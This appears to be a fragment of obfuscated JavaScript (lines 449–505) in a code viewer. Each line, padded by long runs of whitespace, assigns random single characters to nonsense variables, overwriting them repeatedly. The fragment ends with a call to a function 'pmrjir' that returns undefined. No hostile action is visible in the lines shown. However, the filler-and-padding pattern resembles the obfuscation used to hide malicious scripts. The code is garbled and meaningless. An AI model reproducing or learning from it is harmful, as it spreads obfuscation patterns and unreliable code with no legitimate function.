                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        449
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        xxvjyz = "k";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          450
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          xxvjyz = "e";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            451
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            xxvjyz = "F";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              452
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              xxvjyz = "5";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                453
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                piuweynw = "m";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  454
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  piuweynw = "a";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    455
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    piuweynw = "A";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      456
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      piuweynw = "U";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        457
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        piuweynw = "I";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          458
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          piuweynw = "e";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            459
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            piuweynw = "o";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              460
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              piuweynw = "h";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                461
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                piuweynw = "s";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  462
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  piuweynw = "l";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    463
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cufth = "t";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      464
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      cufth = "e";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        465
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        cufth = "D";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          466
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          cufth = "k";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            467
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            cufth = "C";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              468
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cufth = "m";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                469
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                cufth = "l";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  470
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  cufth = "F";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    471
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cufth = "j";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      472
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      cufth = "u";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        473
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        ugacr = "b";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          474
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          ugacr = "o";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            475
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            ugacr = "s";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              476
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ugacr = "J";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                477
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                ugacr = "c";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  478
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  ugacr = "o";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    479
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ugacr = "t";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      480
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      ugacr = "9";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        481
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        qbntkblvf = "y";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          482
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          qbntkblvf = "i";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            483
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            qbntkblvf = "R";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              484
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              qbntkblvf = "M";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                485
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                qbntkblvf = "k";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  486
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  qbntkblvf = "q";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    487
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    qbntkblvf = "F";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      488
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      qbntkblvf = "U";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        489
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        ljrbitiai = "W";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          490
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          ljrbitiai = "f";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            491
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            ljrbitiai = "Y";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              492
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ljrbitiai = "J";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                493
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                ljrbitiai = "i";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  494
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  ljrbitiai = "z";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    495
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ljrbitiai = "A";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      496
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      ljrbitiai = "%";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        497
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        ucjfpbj = "g";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          ucjfpbj = "g";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            499
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            ucjfpbj = "p";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              500
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ucjfpbj = "u";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                501
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                ucjfpbj = "M";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  502
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  ucjfpbj = "j";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    503
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ucjfpbj = "o";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      504
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      ucjfpbj = "1";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        505
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        pmrjir ( );
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • pmrjir() ➔ undefined
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Reset < >